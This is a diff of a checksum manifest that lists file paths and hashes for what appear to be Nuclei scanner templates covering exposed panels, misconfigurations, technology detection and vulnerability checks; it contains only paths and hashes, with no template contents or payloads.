http/exposed-panels/joget/joget-panel.yaml:a7dfc3fd4921ef9b756bc772a6ce004594f1c29f
http/exposed-panels/joomla-panel.yaml:c3ea62950f42c467e19f7a5e7760cd69dfd28bd3
http/exposed-panels/jorani-panel.yaml:7dc1efc38bc8c6be36cec66f40d930500c085baf
@ -3971,7 +3988,7 @@ http/exposed-panels/kfm/kaes-file-manager.yaml:163a84373e69e74099b9f771341054ad2
http/exposed-panels/kfm/kfm-login-panel.yaml:d86163cf22c63d250566759202ef64092196705f
http/exposed-panels/kibana-panel.yaml:ab4bffa526cbad54f4b8abf2bc46f5ddc1e4a284
http/exposed-panels/kiteworks-pcn-panel.yaml:8eb88c7a52943afd620e5f92e0f12ea4b2fdef16
http/exposed-panels/kiwitcms-login.yaml:4f2a08cf85319ee93b172cf3e09da11eaa08d097
http/exposed-panels/kiwitcms-login.yaml:e64ae1148fd5fab74c8ea15391bca33551139c2a
http/exposed-panels/kkfileview-panel.yaml:c42a91ee90824170f94bcaaf4a396e33f8d1420b
http/exposed-panels/klr300n-panel.yaml:3e7feed65269887a82bdab5a4971d4748236fdcd
http/exposed-panels/kodak-network-panel.yaml:ff5ef39f196e3dcec90c1df4f05cee3b70ffa854
@ -4025,7 +4042,7 @@ http/exposed-panels/mailhog-panel.yaml:086f46cbe44037b7a0e98e2de15e3b244478c498
http/exposed-panels/mailwatch-login.yaml:5806b40c7aba9a02c1df2d3984844a3d0fbda20c
http/exposed-panels/maltrail-panel.yaml:e64bf45e9330011747c012809705e894700e308b
http/exposed-panels/mantisbt-panel.yaml:a79ef369723d43f4d20f4d94abe7bbabec3afa04
http/exposed-panels/matomo-login-portal.yaml:39af2391e82e09f349ad6ee47898d5604fa4ad25
http/exposed-panels/matomo-panel.yaml:8e36acccca8cb5c975d38a314c941c22a2204faf
http/exposed-panels/mautic-crm-panel.yaml:53a7b87d599c64c95672e30524f3c8bfe053160d
http/exposed-panels/memos-panel.yaml:889e1696bded69cb5833dc1cd22b44ac49318773
http/exposed-panels/meshcentral-login.yaml:6112dd7a01bf42c06b47b029f3aafb08d85f7ee0
@ -4067,6 +4084,7 @@ http/exposed-panels/mybb-forum-detect.yaml:4952dbcff061cad8b74587f35167a1f4f1229
http/exposed-panels/mylittleadmin-panel.yaml:877ecb616dac31ac0a797d7442aa0d73c3a27213
http/exposed-panels/mylittlebackup-panel.yaml:aeca8bc7bb4148c692ec3ca9dc0234b20fdb4847
http/exposed-panels/mystrom-panel.yaml:5c96e157c04f47c7dbb0dc608022cc6b9ffd5a82
http/exposed-panels/n8n-panel.yaml:9d42e6a43dd7de68c76bf38cfd681275147517e5
http/exposed-panels/nagios-panel.yaml:0c1f3fc739fa86cf129cb05c6f8a2a3c10b151d6
http/exposed-panels/nagios-xi-panel.yaml:1b0b6e992805420d16f23c964decfec9e9962138
http/exposed-panels/nagvis-panel.yaml:ba54ad10ecee829efd444c6c975cac871ddd03ad
@ -4085,7 +4103,7 @@ http/exposed-panels/netgear-version-detect.yaml:1f15ea1787f6da7ace19e6d13e2ea8d3
http/exposed-panels/netis-router.yaml:37a842ce9b050b0adf42caa1683e033cf9f3cf27
http/exposed-panels/netlify-cms.yaml:52f77df2c632a0b49af6f01e67f69347308dc73a
http/exposed-panels/netris-dashboard-panel.yaml:53082539f3e6021174c2d0c07a47c947ca431659
http/exposed-panels/netscaler-aaa-login.yaml:cb406a8b3564ac9c8ef51aefb7a59b62040fc8de
http/exposed-panels/netscaler-aaa-login.yaml:54b265bd78107b40ff7b88241e4f5b4e3ec2b6c5
http/exposed-panels/netscaler-gateway.yaml:5c1eba07db0920fce2faf0765af99d6e835f6571
http/exposed-panels/netsparker-panel.yaml:bda43642097cc23a68a06f87ff9e42f7b5c38486
http/exposed-panels/netsus-server-login.yaml:7458b5c53ddd54f88b9140e893828568fd7f5c85
@ -4094,6 +4112,7 @@ http/exposed-panels/nginx-admin-panel.yaml:492c1a52a4892201610677d018a5bccc85174
http/exposed-panels/nginx-proxy-manager.yaml:cbe5a23f32c9f95f9e4a914c4cf17d92c70ef5b5
http/exposed-panels/nginx-ui-dashboard.yaml:1fc5b05816c393f8b7a6dbda82809da081e770af
http/exposed-panels/ni-web-based-panel.yaml:1757bfbe129e69cbceae933ba2e363a706722866
http/exposed-panels/nocodb-panel.yaml:0519137744c936f9cff62dcf92e8b5885a9fef04
http/exposed-panels/noescape-login.yaml:7dae2defb736e4a2e4f595cd60ee6afbd8da2814
http/exposed-panels/nordex-wind-farm-portal.yaml:e6fd0977f64c3aa20c3e94134e2e617ef221fde3
http/exposed-panels/normhost-backup-server-manager.yaml:4ea654fd59759fc5b6fb404e3967142c7c5150c8
@ -4199,6 +4218,7 @@ http/exposed-panels/plastic-scm-login.yaml:fe6d092c51727b09cb9451654271bd3e5e674
http/exposed-panels/plausible-panel.yaml:618d3a4a135c8e80ca35582a0620bcb2d300c63f
http/exposed-panels/plesk-obsidian-login.yaml:7f424a234fc5e054a1186ed9fdf7fa84780e66a6
http/exposed-panels/plesk-onyx-login.yaml:f423044e8413a51421c210b0f4f49445efb4606c
http/exposed-panels/pocketbase-panel.yaml:fb5f9369e3ec6a95be6cf0dec0f2fc70639e8176
http/exposed-panels/polycom-admin-detect.yaml:09ff65e682061de9f992c4c4539615e0a62fdc4c
http/exposed-panels/polycom-login.yaml:9dfb75c477c1d850cb3c4e767e5f1027c65c7e01
http/exposed-panels/portainer-panel.yaml:e3b502c10ccb719774f551f98c8676d5b60c0403
@ -4229,6 +4249,7 @@ http/exposed-panels/pypicloud-panel.yaml:a8e13404f2ea40b2acaad8749a8c69b862e3b5e
http/exposed-panels/qBittorrent-panel.yaml:0b49b83c08748b4b91db7e36fb06518a6d08ec88
http/exposed-panels/qdpm-login-panel.yaml:8f5b3e24b7156ab64d0d391ae05c299118ced753
http/exposed-panels/qlik-sense-server.yaml:4db84c0d1e3d5c1cfab2307ce8711291a039c6da
http/exposed-panels/qlikview-accesspoint-panel.yaml:cd944a5ea2366ac3dc76a3b95ad122a496f77738
http/exposed-panels/qmail-admin-login.yaml:4ba2c84becd76232e9b799bbc3433797e3d5a1f4
http/exposed-panels/qnap/qnap-photostation-panel.yaml:c7692c948143c7affd3ec7447e5038fe3ab23c6d
http/exposed-panels/qnap/qnap-qts-panel.yaml:4939e5e7c6952bee595287b84575fad48db6435a
@ -4423,6 +4444,7 @@ http/exposed-panels/tibco-spotfire-panel.yaml:7abc1e8affa4065623831a8dfa9ebcc5f3
http/exposed-panels/tigase-xmpp-server.yaml:75dcbfb91190aa716fb8894a26fad88ebcf1c4b4
http/exposed-panels/tikiwiki-cms.yaml:704f538632b5890953ff4ee1550305c9b6f9bcc4
http/exposed-panels/tiny-file-manager.yaml:5227b4eaf964e71cb70ca203584d07e6abfcb4d9
http/exposed-panels/tiny-rss-panel.yaml:de8fb04fcf6c23c02809fccfb37249b02a89aa14
http/exposed-panels/tixeo-panel.yaml:c4d4bdf1928f96106840072e7921b6914df9b2d1
http/exposed-panels/tomcat/tomcat-exposed-docs.yaml:83eeb31ba321516ebf82f3d494663984d7b9a0bc
http/exposed-panels/tooljet-panel.yaml:3769667dde0edf58291e63302ba316456c70b37d
@ -4438,14 +4460,16 @@ http/exposed-panels/turnkey-openvpn.yaml:39c452eb93078b6a3c5c3b7f7789fba65fb9dbf
http/exposed-panels/tuxedo-connected-controller.yaml:ee4f09412b94ae739070bf2b62882f835d9f0767
http/exposed-panels/typo3-login.yaml:72cfd4ea09b641aada781d8217ae54a23b88a0cd
http/exposed-panels/uipath-orchestrator-panel.yaml:af4705f7f98e419ceddff8130581d58ce6028339
http/exposed-panels/umami-panel.yaml:f6551441a99dfa7eae097d14e7adc8122ce8cb8d
http/exposed-panels/umbraco-login.yaml:fdfd46a20aa2721ffa8784101d3b1b69f2393ea7
http/exposed-panels/unauth/tautulli-unauth.yaml:091217f1b5773c345e63401e05aa540485af4672
http/exposed-panels/unauth-xproxy-dashboard.yaml:c01ec537b431a19a6379b6616d1656cb6081b84a
http/exposed-panels/unauthenticated-frp.yaml:7dce249491443ca0f4d7954e2a0fed07a90418d6
http/exposed-panels/unibox-panel.yaml:cdf9eb8ff2bb47a65d41b11e01c20e80e129fc42
http/exposed-panels/unifi-panel.yaml:7453d0729a5fd66914347f5ee4a41a958b05cd1e
http/exposed-panels/unleash-panel.yaml:be51937dd1d4f1ac7feadf1883b3026016d08f53
http/exposed-panels/untangle-admin-login.yaml:e608572d5f228bc2af5c784d0944ec5cd7e6174b
http/exposed-panels/uptime-kuma-panel.yaml:e1a6b283b6595f63cffa175755728ca7ff9cd3fe
http/exposed-panels/uptime-kuma-panel.yaml:422d9cf4aa37790f9729c374453d9a4c7a3cfa88
http/exposed-panels/urbackup-panel.yaml:907afaf682a672c3770668b8c640cbf7bb233d8a
http/exposed-panels/user-control-panel.yaml:5b43e1f426bb7b526af0d8ccb823c7e66a462c4d
http/exposed-panels/v2924-admin-panel.yaml:4a2d30c3cec92f5e7dda0bb1ba5546cf3f0fe2dc
@ -5074,6 +5098,7 @@ http/honeypot/citrix-honeypot-detect.yaml:a632cb08a12e2d3dfe69f8b4e8d0cbd4d44cbb
http/honeypot/dionaea-http-honeypot-detect.yaml:7830d2af83e16b50c0a4b647defe89c9ac5efe25
http/honeypot/elasticpot-honeypot-detect.yaml:73cb47452335d2c4e95f07bdbaabcb7800b634aa
http/honeypot/snare-honeypot-detect.yaml:b63d27a24618602947f861b69eec3ceee8c08bd5
http/honeypot/tpot-honeypot-detect.yaml:d6bba366446a11da0938639a63c137fff9baf522
http/iot/ampguard-wifi-setup.yaml:3fdb76a85fa7376b4ddef9a2af7f4cfadd9db2fb
http/iot/apc-ups-login.yaml:915c40c7c4e581a0636cc99d6d7ac0582f7da117
http/iot/automation-direct.yaml:9b578eb3fea63e67a0c939c9cce372e94ad3de19
@ -5315,9 +5340,9 @@ http/misconfiguration/gitlab/gitlab-user-enum.yaml:09ffd851b3108524029e04ca4f1a5
http/misconfiguration/gitlist-disclosure.yaml:8111ac3c10bc09b42d9c2bc565cd5758cb6a220e
http/misconfiguration/global-traffic-statistics.yaml:f5ab7750ae4d32d8b857b8290bcd98ac1358fa0d
http/misconfiguration/glpi-directory-listing.yaml:29bb88890e78f83428d00799224679dfd993e1bc
http/misconfiguration/gocd/gocd-cruise-configuration.yaml:5d6cff182941ab13f63a9670759c38e35bf48200
http/misconfiguration/gocd/gocd-encryption-key.yaml:a74d049cb9d02c3ab676794fcb6eb8905b175dd7
http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:5511df1524242c7128bd033238a4dae5db3fb86a
http/misconfiguration/gocd/gocd-cruise-configuration.yaml:afd6d002fdf184b81dc31d6774f5cf44c9949dba
http/misconfiguration/gocd/gocd-encryption-key.yaml:be6a8821d31748cd4dd513aa480f85039b05f505
http/misconfiguration/gocd/gocd-unauth-dashboard.yaml:21d7318675025f7ca3566b9eb3c054fc7da276a4
http/misconfiguration/google/insecure-firebase-database.yaml:9b13af3f5222a4143b0d4075bd1eeb391709de4f
http/misconfiguration/gopher-server.yaml:049ecafed940f9efdec3f7ea458fb6f516e22238
http/misconfiguration/grafana-public-signup.yaml:0ca43758c6cefb8473b88d8799dc8083bbdb4b09
@ -5335,13 +5360,13 @@ http/misconfiguration/haproxy-status.yaml:cd67a127bba5cbe7592fcddf3f9e4abe9ffccb
http/misconfiguration/healthchecks-ui-exposure.yaml:5880a258da373e69f620756492fe363c88305114
http/misconfiguration/helm-dashboard-exposure.yaml:5d973ff4a1915a7fbbf754b9f5b3fc68146d07b9
http/misconfiguration/hfs-exposure.yaml:c274f6bce61713807f3886d7e4d3a6b58a8b5d74
http/misconfiguration/hikivision-env.yaml:36e1e58bdcadd6cb6d52b7929a57989aa2b0d98f
http/misconfiguration/hikvision-env.yaml:a6af8cc4bdf077654c1ca5091b987c3d081e4c32
http/misconfiguration/hivequeue-agent.yaml:df621ff4d3dbb3ea3e652c99fbea133eca2d3192
http/misconfiguration/hp/unauthorized-hp-printer.yaml:960dd267c9ce3fe43452ea0d5e30fdb4cc1430be
http/misconfiguration/hp/unauthorized-printer-hp.yaml:69f3ee3a5ae28923c962d7e2b23a0deb5e824611
http/misconfiguration/hpe-system-management-anonymous.yaml:82910902ebfef5f84f465fa13c5dcbd83572426a
http/misconfiguration/http-missing-security-headers.yaml:62e00bd5126dbd778c766aa3bb0bd1f2fc546006
http/misconfiguration/https-to-http-redirect.yaml:9c60308f5bfe2dfc11ff9e1682bf68d0b204b3f5
http/misconfiguration/https-to-http-redirect.yaml:cccf8e9ceb416d8e224b314e9952d676e592c00e
http/misconfiguration/ibm-friendly-path-exposure.yaml:77e6c72a9cae1a9b0a6afd79b159b08db996e463
http/misconfiguration/ibm-websphere-xml.yaml:659d65c9f64e0b6ce45ec519419cdfaf9cb77fd1
http/misconfiguration/installer/acunetix-360-installer.yaml:13688236245b336b6a74b5b2ddce35d2e35f6421
@ -5365,6 +5390,7 @@ http/misconfiguration/installer/concrete-installer.yaml:4f7a95cbe753e256638993a2
http/misconfiguration/installer/connectwise-setup.yaml:a027b152c37cfaa8a6dace9f8ad093c294167beb
http/misconfiguration/installer/contentify-installer.yaml:349037f164610234a652ec6b38511fd5c5e1d16d
http/misconfiguration/installer/cube-105-install.yaml:7d52b05c472422fd5821315b3c801aeacdefcdb0
http/misconfiguration/installer/custom-xoops-installer.yaml:ee8a3bf092cb7c1efd90f278a5ad74e2f4442510
http/misconfiguration/installer/discourse-installer.yaml:cf9bf85966145a193efedf3b7ce26012217d959b
http/misconfiguration/installer/dokuwiki-installer.yaml:a572ea8dd4751008cd46b4319fe478d147173ac7
http/misconfiguration/installer/dolibarr-installer.yaml:6c971d39c8f61247ee422817192d8d1af5918a3f
@ -5376,6 +5402,7 @@ http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287f
http/misconfiguration/installer/espocrm-installer.yaml:fccc8f34a7a3101fe1171472726b160881408b3a
http/misconfiguration/installer/eyoucms-installer.yaml:a39da2ac7d242b481b6cebd70a0b4b89317a903b
http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea
http/misconfiguration/installer/froxlor-installer.yaml:4e750156a862eba74eb7edf2efa7b91fb7b273dc
http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a
http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e
http/misconfiguration/installer/gibbon-installer.yaml:c22815fca903475c70deeecb36bb5ca4bdde2283
@ -5400,6 +5427,7 @@ http/misconfiguration/installer/mcloud-installer.yaml:833e2575e02b6336777860b535
http/misconfiguration/installer/metaview-explorer-installer.yaml:1b9dce3e9610d021aa211b44ed5397207c241be9
http/misconfiguration/installer/monstra-installer.yaml:bcc03eec7693c2c9e5c960958ab70b00bcea40bf
http/misconfiguration/installer/moodle-installer.yaml:79053437435e1590bb58eb747a87109c8c5d026b
http/misconfiguration/installer/moosocial-installer.yaml:fcb42a5d3af9d846ec71cc165bde4962bb381c71
http/misconfiguration/installer/mosparo-install.yaml:0b6f15dce7c5579e4e7a2db365050972b8be308a
http/misconfiguration/installer/nagiosxi-installer.yaml:3dbd7b4606de96c3d2ef86245924586928ade5c9
http/misconfiguration/installer/netsparker-enterprise-installer.yaml:87452a1aa538401b678c40487818511b300f67d2
@ -5419,6 +5447,7 @@ http/misconfiguration/installer/permissions-installer.yaml:ffeca03066710cc2c3ac0
http/misconfiguration/installer/phpbb-installer.yaml:5f50f480c25285283d3f0704aa52afc97a43483a
http/misconfiguration/installer/phpgedview-installer.yaml:c3abf511068283554097640a87a899102a008d08
http/misconfiguration/installer/phpipam-installer.yaml:fd13b9a8528ac804f19dea5ffb775e82aa01b87d
http/misconfiguration/installer/phpmyfaq-installer.yaml:d21e8a4ea781328f94303a5d1ac610abb96a19a6
http/misconfiguration/installer/phpwind-installer.yaml:382bd97db9268ea3922f6ea937ef2d07a77c0cf0
http/misconfiguration/installer/piwik-installer.yaml:13b6e4cc5e4a106ac91c0f984089a3465a67af49
http/misconfiguration/installer/pmm-installer.yaml:32509e9fe33719aacf310d33d0a40b3f1c065e91
@ -5430,6 +5459,7 @@ http/misconfiguration/installer/ruckus-smartzone-install.yaml:48c25f2717f5e5a62a
http/misconfiguration/installer/ruckus-unleashed-install.yaml:55ab5a07d38c07dc39480173dbcbbbcb4e297e5d
http/misconfiguration/installer/sabnzbd-installer.yaml:2acada1b432839b43acf35fc04137d074444be5c
http/misconfiguration/installer/server-monitor-installer.yaml:f39667bafa3e2904cb11eb521b4399020c8711c8
http/misconfiguration/installer/setup-github-enterprise.yaml:4c9c45144ef261e828a016e779c788a97640107d
http/misconfiguration/installer/shopify-app-installer.yaml:2181b56f2923103189ec1d6902429ee3b1f32710
http/misconfiguration/installer/shopware-installer.yaml:4c79ee2e79e426b2083cdc6465b55e54444f8fab
http/misconfiguration/installer/smf-installer.yaml:8a1dc0aa144a9dcc21e28700824d31defe69ccc9
@ -5461,7 +5491,7 @@ http/misconfiguration/installer/zabbix-installer.yaml:c68f624b2a0260aff9280223ed
http/misconfiguration/installer/zencart-installer.yaml:4b3f6cc0c7a3fdf855d63035860f48020f1c602a
http/misconfiguration/installer/zenphoto-setup.yaml:90123a5fbb91a4f9e860152c5f07d8a141669ed8
http/misconfiguration/intelbras-dvr-unauth.yaml:d03e03c47bafc20e0abed9052e731db888770f83
http/misconfiguration/internal-ip-disclosure.yaml:e6a79c10e8a84b1146826ec646fe0beb90b86761
http/misconfiguration/internal-ip-disclosure.yaml:ffb198989918d9f1e1cafafcd3470931ff6eaa4e
http/misconfiguration/iot-vdme-simulator.yaml:c4c40ebfaba9239c6e0c5f14e6957533cdb11631
http/misconfiguration/jaeger-ui-dashboard.yaml:4584cce5677c777fcde741579d1ba52bccec4491
http/misconfiguration/java-melody-exposed.yaml:3e4299de8400eb02ef9f769cc044e7255e87522e
@ -5497,7 +5527,7 @@ http/misconfiguration/linktap-gateway-exposure.yaml:8445d5ca649bd0696ca61bb561b3
http/misconfiguration/locust-exposure.yaml:a05194cd9aa186052bbae31223d52c0ea9ab3b68
http/misconfiguration/lvm-exporter-metrics.yaml:f1cdf9f009abc6debe3fc3c58740d68b00322c64
http/misconfiguration/manage-engine-ad-search.yaml:e58d8b0d6b16f99046807fb55b73df8dc558bd2d
http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:017a97227ca466c4831450986e59a3c99ea1f781
http/misconfiguration/microsoft/ms-exchange-local-domain.yaml:bc55398c10b87bc6a5c507b4710e3462b264f935
http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac3db72af84f34e3
http/misconfiguration/misconfigured-concrete5.yaml:d56475cb0edd78cf18150ac40eba183c0a201d7d
http/misconfiguration/misconfigured-docker.yaml:ca18899f575d3f7df82e3a33e2a9b4b0f75582ef
@ -5595,7 +5625,6 @@ http/misconfiguration/server-status-localhost.yaml:920d65e7e9cd3d8b02094cc32aa42
http/misconfiguration/server-status.yaml:0fbfb6c7b6e541aade005e601c0a5d83acdfe202
http/misconfiguration/service-pwd.yaml:625117d7929ae17d0cf02bb5b4e9fefee1ca36b9
http/misconfiguration/servicenow-widget-misconfig.yaml:7946ba306bf6bdea013874dd95b68cab9c106c7b
http/misconfiguration/setup-github-enterprise.yaml:14bd64ce441f1a736a86cd8b6b5789d5e8be4792
http/misconfiguration/shell-history.yaml:ef801bc0a0ded3159e0d15422845a35286b269e0
http/misconfiguration/sitecore-debug-page.yaml:2934b7c26a571f8a4c2f13a9bd99059a5c4e974d
http/misconfiguration/sitecore-lfi.yaml:1a0abe7d31d65b931c8e017a94fecc7e3086333c
@ -5654,7 +5683,7 @@ http/misconfiguration/teslamate-unauth-access.yaml:446a2240cd1f6c0de4961e997f7e0
http/misconfiguration/thanos-prometheus-exposure.yaml:d238fc8c96c28626700eb47c6949a5420988bbf5
http/misconfiguration/thinkphp-errors.yaml:f3ddd674ae9e75b7760f111edf8347d3babb994e
http/misconfiguration/tiny-file-manager-unauth.yaml:022c4efede57b4b63e9e54ea86fc05b756100d69
http/misconfiguration/titannit-web-exposure.yaml:7a171e9165d8f1a7467e018c320247c2eba80b9c
http/misconfiguration/titannit-web-exposure.yaml:90a7e87de3dc02e6f213e29f4d6bce3359464041
http/misconfiguration/tls-sni-proxy.yaml:a2c22f5e9d5b37efd159f4985d09700912cc59ed
http/misconfiguration/tomcat-cookie-exposed.yaml:3b3d6328a22661f3aa85b86e5c9f49c5eff9e5c6
http/misconfiguration/tomcat-scripts.yaml:140d28fb99d8811e144b9cab5bf574697bcdf4de
@ -5692,6 +5721,7 @@ http/misconfiguration/unauthenticated-zipkin.yaml:73f69a3db4803b395469ae1d03d6a8
http/misconfiguration/unauthorized-h3csecparh-login.yaml:52ba2425210b300862c20a149417b849615ac9e0
http/misconfiguration/unauthorized-plastic-scm.yaml:f0b988e5aa54ff9c9d233a6a15796cfdb4270569
http/misconfiguration/unauthorized-puppet-node-manager-detect.yaml:eb1d62caa10228fd5847ef05c1ba56eef9756320
http/misconfiguration/unigui-server-monitor-exposure.yaml:e3a54c9004bcf6d77aa157f31df9d027ed46c812
http/misconfiguration/untangle-admin-setup.yaml:48ca3177690a4ffd930faf99a443caade96231c7
http/misconfiguration/ups-status.yaml:e72e5c146b99b7efed8a61faf81517cc5f9e9736
http/misconfiguration/v2x-control.yaml:1e5196bc738b2850f7c29df0a9af5e933fde4e7f
@ -6563,6 +6593,7 @@ http/technologies/ambassador-edge-stack-detect.yaml:fcb8fa46e689fb4d35bb7fbd4be8
http/technologies/angular-detect.yaml:7719617c08923ab10058ecbc5d9fe19ff7195d77
http/technologies/ansible-awx-detect.yaml:44114d7cf04fcf41b49e86fee243b0c5ecc2ed2b
http/technologies/apache/airflow-detect.yaml:36837eb295b1c7ffced3d9864087d6dac52969dd
http/technologies/apache/apache-answer-detect.yaml:0edd4322267dfd814e651abe28b611f686680736
http/technologies/apache/apache-axis-detect.yaml:55d59a4142e61ae3ead1bf03594767f59cac83dd
http/technologies/apache/apache-cocoon-detect.yaml:773bd2977ddbb3403acfcd0f8e4cf10c81b84495
http/technologies/apache/apache-detect.yaml:1ec0c234a8a4487c59726af437b6eaa1fa249507
@ -6603,6 +6634,7 @@ http/technologies/bigbluebutton-detect.yaml:d0fecbfe3234220cfc43fd3f3ac058474e71
http/technologies/bigip-config-utility-detect.yaml:7132fa9fc894cb8fbf91eb0edb0736f59bc6c1fa
http/technologies/bigip-detect.yaml:79ac84a48c9033805f48ded3907cbaf89b83e564
http/technologies/blazor-webassembly-detect.yaml:923ad3dec475cfd53301c625e493af2a0bc560db
http/technologies/boa-web-server.yaml:f0f198ec1d26c859c0727b2b72fb8f4ed399a803
http/technologies/burp-api-detect.yaml:c5e1c15a82e7f5f2c90464fafbc3da3cf7c5952e
http/technologies/burp-collaborator-detect.yaml:1ba217f8c0b3d0587c8fb861468c229446175e83
http/technologies/carestream-vue-detect.yaml:8de6563e11009789749310748935b1181f1a5e31
@ -6623,6 +6655,7 @@ http/technologies/confluence-detect.yaml:a04bc71e42d461e8530902a2a69ae0f187506ff
http/technologies/connectwise-control-detect.yaml:35b690093c8b71aa317417cd82264891dcbe277e
http/technologies/couchbase-sync-gateway.yaml:f2ca1759ea3106b3f21b839b70fc52a23b67fcc3
http/technologies/craft-cms-detect.yaml:b0c7e4f8f830ab3e2f599ee62975557f48a21559
http/technologies/craftercms-detect.yaml:0239600f4a3b22dc74157fc4035819d87936fa74
http/technologies/csrfguard-detect.yaml:7a0e3757762d2336706a42a0e0218391624b96a6
http/technologies/cvsweb-detect.yaml:37d98f3ac251889862ae9937d35ac9823e7ccd94
http/technologies/dash-panel-detect.yaml:018b9e3b920a2b3622e740c9d022499ab09fe0c8
@ -6682,7 +6715,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872
http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1
http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac
http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a
http/technologies/favicon-detect.yaml:20226a4707ea3e5d8e45845ff2ab3a2069fde0ff
http/technologies/favicon-detect.yaml:88d64768349b41aa6efe98a6d64285ff73ba054e
http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd
http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2
http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9
@ -6728,6 +6761,7 @@ http/technologies/icecast-mediaserver-detect.yaml:e8cd04701c56d72863370946d98a0a
http/technologies/icecast-server-detect.yaml:9c420fa5e33996ea06f25259e6d07fbc940e416d
http/technologies/identity-server-v3-detect.yaml:1d81d62bf57fbefb494e082d68cb7e5568382f02
http/technologies/ilo-detect.yaml:71e46841d352f772fe4ef93feed925411dd00ad0
http/technologies/imgproxy-detect.yaml:a5819e528c4e6c397c971fe78e49fb76ba0e6820
http/technologies/impresscms-detect.yaml:aed6cbf7a0e39d65461ad18a94870d5498a81ee5
http/technologies/influxdb-version-detect.yaml:f841eecc70b68b122327d0af759d612c344c18c9
http/technologies/interactsh-server.yaml:7b66780d07fddd75e7a107ff31dd20d43a2f1bfe
@ -6902,6 +6936,7 @@ http/technologies/splunkhec-detect.yaml:b12fe8414a25f23ca27add683cf845cbb65c3f93
http/technologies/spring-detect.yaml:915d140e39b0fd25c725861c526bd2852d3af20a
http/technologies/springboot-actuator.yaml:eea78a3c5ccc81b70826132839dd3531ebc07667
http/technologies/springboot-whitelabel.yaml:eb9058fb153f9146a1c1805473ec96199b243184
http/technologies/statamic-detect.yaml:9b14322353da40d62d366fab6d4e882025a6d761
http/technologies/strapi-cms-detect.yaml:ab2db3c715882e9487d6cfce22845c3cfb6a5168
http/technologies/subrion-cms-detect.yaml:79c424841060d17ac25109a9ec520c7e0c208bea
http/technologies/sucuri-firewall.yaml:4e60a53d2ddcc7b48dc6fcb42149747927a140b4
@ -6919,9 +6954,11 @@ http/technologies/thinkphp-detect.yaml:4f4c4b8bb5ea605c7dd26335d710811935db624d
http/technologies/tibco-businessconnect-detect.yaml:df1e040bbfa4c989246929173292176c9f5e3137
http/technologies/tibco-spotfire-services-detect.yaml:26a79d78f2c140283420e74921930270ad17851a
http/technologies/tileserver-gl.yaml:27fe637c0f3de39676585f41d5980e246441bdab
http/technologies/tinyproxy-detect.yaml:1f12faf3ae2dd38f5c8f0aed9753d65ce611b795
http/technologies/tor-socks-proxy.yaml:ad664f3598d1039dd335f4128e1cb81ceeef4864
http/technologies/tornado-server-login.yaml:7d8148d6ca18ef79abc33aceacbf8dbafd31d4d4
http/technologies/typo3-detect.yaml:206df0bc720861958780557535b8b4693ec64636
http/technologies/uni-gui-framework.yaml:24da39f35b8c52b287e5c62359c6bdfffafc32a2
http/technologies/utility-service-detect.yaml:c6754cc4daf389f30429c27e153462cc4b5f65a4
http/technologies/vbulletin-detect.yaml:a48f02b03dc57037391b6c02e06f20906b9d9015
http/technologies/versa/versa-analytics-server.yaml:ab6b798c55d8379b64cd1bc97b70ee6377f151e5
@ -7156,6 +7193,7 @@ http/technologies/wordpress/plugins/wps-hide-login.yaml:49e23dfebb88ab4c3822f56d
http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:74b65c6c5ca927a3cc48713f2e12af3315585a02
http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5
http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:b585238fc372f9d7131fb53c9bde96f0c8224553
http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:823e6d8fb3f52400cd29e17aa6e9d9e5215fb639
http/technologies/wordpress-detect.yaml:cffcda2750ea67cb0bfe228180718a5071f9e031
http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f
http/technologies/wso2-products-detect.yaml:810c03f8a2986fd7939b83bca35b9a6f95196a63
@ -7448,7 +7486,7 @@ http/vulnerabilities/cisco/cisco-unified-communications-log4j.yaml:603bb5279bc4d
http/vulnerabilities/cisco/cisco-vmanage-log4j.yaml:ea1ab53653cf1c170515c6ee5e6867b76f167b01
http/vulnerabilities/cisco/cisco-webex-log4j-rce.yaml:aef89b607f0527340246a54d607fb5a0c4533d5e
http/vulnerabilities/cisco/cucm-username-enumeration.yaml:8f1f34c21c46c88b1faf80e11363097dc18d7c03
http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:b31d091364cfce9c3384b7db96cf236992d044f4
http/vulnerabilities/citrix/citrix-oob-memory-read.yaml:7866f3668d1f681eff787a1c2b9146a491251e11
http/vulnerabilities/code42/code42-log4j-rce.yaml:c6eca1ad5491f3ab51671acd9067242f3f77767e
http/vulnerabilities/concrete/concrete-xss.yaml:85b12fb54e5f98736f4bc70df764384fe675f2f2
http/vulnerabilities/confluence/confluence-ssrf-sharelinks.yaml:305c4b65dec3bc65e31fcd5c0b72a9841e630064
@ -7613,6 +7651,7 @@ http/vulnerabilities/other/cacti-weathermap-file-write.yaml:7df8c70c271017c79e50
http/vulnerabilities/other/caimore-gateway-rce.yaml:8abeb38c5a0c6b11e9dfe4c7e363f9c839c2506e
http/vulnerabilities/other/carel-bacnet-gateway-traversal.yaml:2c49088f1d34938eb85769ed23d78433e243481a
http/vulnerabilities/other/carrental-xss.yaml:d92d2f7000cc91fd9c13049464b3ce0369c7b33e
